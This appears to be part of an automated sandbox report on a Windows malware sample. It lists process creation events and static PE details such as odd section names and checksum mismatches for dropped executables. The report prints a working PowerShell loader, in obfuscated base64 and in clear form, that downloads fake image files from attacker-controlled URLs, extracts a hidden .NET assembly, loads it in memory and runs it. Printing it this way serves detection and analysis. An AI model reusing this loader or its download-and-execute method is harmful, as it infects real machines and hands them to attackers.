@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec

Source: 88823343d6.exe.6.dr

Static PE information: 0xDF9E7476 [Fri Nov 19 11:54:30 2088 UTC]

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe

Code function: 9_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

9_2_00406328

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.6.dr	Static PE information: real checksum: 0x1ce998 should be: 0x1cf8c2
Source: random[4].exe0.6.dr	Static PE information: real checksum: 0x41c807 should be: 0x410b63
Source: random[3].exe1.6.dr	Static PE information: real checksum: 0x646529 should be: 0x6490cc
Source: 318ea12e54.exe.6.dr	Static PE information: real checksum: 0x1f6133 should be: 0x1f79ef
Source: Fe36XBk[1].exe.6.dr	Static PE information: real checksum: 0x220621 should be: 0x21e123
Source: random[1].exe2.6.dr	Static PE information: real checksum: 0x0 should be: 0xd2e10
Source: 8b3fbc1053.exe.6.dr	Static PE information: real checksum: 0x2194c8 should be: 0x218d77
Source: 750afc9298.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x557df
Source: dfd80aba08.exe.6.dr	Static PE information: real checksum: 0x1ce998 should be: 0x1cf8c2
Source: 6bf1f06d50.exe.6.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: real checksum: 0x1fd7da should be: 0x203e52
Source: 7251e9a205.exe.6.dr	Static PE information: real checksum: 0x425e6d should be: 0x42487e
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2127bc should be: 0x21c281
Source: random[2].exe2.6.dr	Static PE information: real checksum: 0x425e6d should be: 0x42487e
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x1bd2ee should be: 0x1bc8e5
Source: loqVSeJ[1].exe.6.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: 88823343d6.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xd2e10
Source: f3f4cac77b.exe.6.dr	Static PE information: real checksum: 0x21954a should be: 0x218f1d
Source: 6ebe63e8d0.exe.6.dr	Static PE information: real checksum: 0x41c807 should be: 0x410b63
Source: random[2].exe0.6.dr	Static PE information: real checksum: 0x0 should be: 0x557df
Source: 5a4a47dccd.exe.6.dr	Static PE information: real checksum: 0x21954a should be: 0x218f1d
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: 4b3b305d14.exe.6.dr	Static PE information: real checksum: 0x1ce998 should be: 0x1cf8c2
Source: e2b0a87ceb.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xd2e10
Source: random[3].exe2.6.dr	Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: 77c6b3ca0a.exe.6.dr	Static PE information: real checksum: 0x1bd2ee should be: 0x1bc8e5
Source: loqVSeJ.exe.6.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: 7fOMOTQ.exe.6.dr	Static PE information: real checksum: 0x1fd7da should be: 0x203e52
Source: random[3].exe0.6.dr	Static PE information: real checksum: 0x1f6133 should be: 0x1f79ef
Source: random.exe	Static PE information: real checksum: 0x2127bc should be: 0x21c281
Source: 487dac876e.exe.6.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: random[2].exe1.6.dr	Static PE information: real checksum: 0x2194c8 should be: 0x218d77
Source: ae70ca0159.exe.6.dr	Static PE information: real checksum: 0x1bd2ee should be: 0x1bc8e5
Source: Fe36XBk.exe.6.dr	Static PE information: real checksum: 0x220621 should be: 0x21e123
Source: Bjkm5hE[1].exe.6.dr	Static PE information: real checksum: 0x1b99da should be: 0x1b6df8
Source: 85abde4902.exe.6.dr	Static PE information: real checksum: 0x646529 should be: 0x6490cc
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x21954a should be: 0x218f1d
Source: Bjkm5hE.exe.6.dr	Static PE information: real checksum: 0x1b99da should be: 0x1b6df8

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: nincghsn
Source: random.exe	Static PE information: section name: mkllyovg
Source: random.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: nincghsn
Source: skotes.exe.0.dr	Static PE information: section name: mkllyovg
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[3].exe.6.dr	Static PE information: section name: .symtab
Source: fbf74eb9d4.exe.6.dr	Static PE information: section name: .symtab
Source: 4b3b305d14.exe.6.dr	Static PE information: section name:
Source: 4b3b305d14.exe.6.dr	Static PE information: section name: .idata
Source: 4b3b305d14.exe.6.dr	Static PE information: section name:
Source: 4b3b305d14.exe.6.dr	Static PE information: section name: jmpbrfec
Source: 4b3b305d14.exe.6.dr	Static PE information: section name: qvaltwhv
Source: 4b3b305d14.exe.6.dr	Static PE information: section name: .taggant
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name:
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name: .idata
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name:
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name: hzdrddah
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name: nesteffg
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: jmpbrfec
Source: random[1].exe.6.dr	Static PE information: section name: qvaltwhv
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: dfd80aba08.exe.6.dr	Static PE information: section name:
Source: dfd80aba08.exe.6.dr	Static PE information: section name: .idata
Source: dfd80aba08.exe.6.dr	Static PE information: section name:
Source: dfd80aba08.exe.6.dr	Static PE information: section name: jmpbrfec
Source: dfd80aba08.exe.6.dr	Static PE information: section name: qvaltwhv
Source: dfd80aba08.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: hzdrddah
Source: random[1].exe0.6.dr	Static PE information: section name: nesteffg
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: ae70ca0159.exe.6.dr	Static PE information: section name:
Source: ae70ca0159.exe.6.dr	Static PE information: section name: .idata
Source: ae70ca0159.exe.6.dr	Static PE information: section name:
Source: ae70ca0159.exe.6.dr	Static PE information: section name: hzdrddah
Source: ae70ca0159.exe.6.dr	Static PE information: section name: nesteffg
Source: ae70ca0159.exe.6.dr	Static PE information: section name: .taggant
Source: f3f4cac77b.exe.6.dr	Static PE information: section name:
Source: f3f4cac77b.exe.6.dr	Static PE information: section name: .idata
Source: f3f4cac77b.exe.6.dr	Static PE information: section name:
Source: f3f4cac77b.exe.6.dr	Static PE information: section name: rsigopyg
Source: f3f4cac77b.exe.6.dr	Static PE information: section name: wlenxwrp
Source: f3f4cac77b.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: rsigopyg
Source: random[2].exe.6.dr	Static PE information: section name: wlenxwrp
Source: random[2].exe.6.dr	Static PE information: section name: .taggant
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name:
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name: .idata
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name:
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name: rsigopyg
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name: wlenxwrp
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name: .taggant
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name:
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name: .idata
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name:
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name: efrqcofg
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name: yqrfybbc
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name: .taggant
Source: loqVSeJ.exe.6.dr	Static PE information: section name:
Source: loqVSeJ.exe.6.dr	Static PE information: section name: .idata
Source: loqVSeJ.exe.6.dr	Static PE information: section name:
Source: loqVSeJ.exe.6.dr	Static PE information: section name: efrqcofg
Source: loqVSeJ.exe.6.dr	Static PE information: section name: yqrfybbc
Source: loqVSeJ.exe.6.dr	Static PE information: section name: .taggant
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: .idata
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: gfrqabhk
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: clsldkbz
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: .taggant
Source: Bjkm5hE.exe.6.dr	Static PE information: section name:
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: .idata
Source: Bjkm5hE.exe.6.dr	Static PE information: section name:
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: gfrqabhk
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: clsldkbz
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: .taggant
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name: .idata
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name: rufmbtlx
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name: krhndclf
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name: .taggant
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name: .idata
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name: rufmbtlx
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name: krhndclf
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name: .taggant
Source: random[4].exe0.6.dr	Static PE information: section name:
Source: random[4].exe0.6.dr	Static PE information: section name: .idata
Source: random[4].exe0.6.dr	Static PE information: section name:
Source: random[4].exe0.6.dr	Static PE information: section name: vhjrfidp
Source: random[4].exe0.6.dr	Static PE information: section name: kkfvquzk
Source: random[4].exe0.6.dr	Static PE information: section name: .taggant
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name:
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name: .idata
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name:
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name: vhjrfidp
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name: kkfvquzk
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name: .taggant
